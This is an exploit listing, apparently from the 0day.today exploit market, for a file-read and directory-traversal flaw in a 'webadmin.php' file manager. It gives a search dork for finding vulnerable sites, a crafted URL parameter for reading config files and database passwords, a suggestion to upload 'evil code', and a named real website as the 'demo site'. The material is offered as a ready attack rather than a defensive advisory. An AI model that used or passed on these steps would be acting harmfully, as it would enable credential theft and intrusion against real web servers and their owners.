[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Read local Config File source (webadmin.php) Vulnerability

Author
DrgpxX
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12715
Category
web applications
Date add
15-06-2010
Platform
php
==========================================================
Read local Config File source (webadmin.php) Vulnerability
==========================================================


Author          : DrgpxX
Group           : Aras cyber Army
Email            : DrgPxX@yahoo.com
Discover        : 13 june 2010
Critical Lvl      : high
Publised        : 15 june 2010
---------------------------------------------------------------------------
Read local Config File source  (webadmin.php)
~~~~~~~~~
Dork : Inurl:"webadmin.php"
~~~~~~~~~~~~~~~~~~
For read config file or etc just Click on change button and next url must be
like :: webadmin.php?id=drq8bvtuvhhqhq4ka8vcg11kn3&dir=%2Fvar%2Fwww%2Fvhosts%2target.com%2Fhttpdocs%2F
now clear id=drq8bvtuvhhqhq4ka8vcg11kn3& in url and write ur file to read source like
dir=index.php
wow ! now u can read data like dbpass traversing directories hijacking source file and etc
IF upload enabled!
you can upload Your evil Code !

~~~~~~~~~~~~~~~~~~~~~~~~~
demp site : just for edu)
http://www.albania-sport.com/webadmin.php

+++++++++++++++++++++++++++++++++++++++
[!] greetiz to ::
    D3stan,grtl,mehdi,hamed.err000r
    All Muslim , Turkish , iranian hackers

+++++++++++++++++++++++++++++++++++++++



#  0day.today [2024-11-16]  #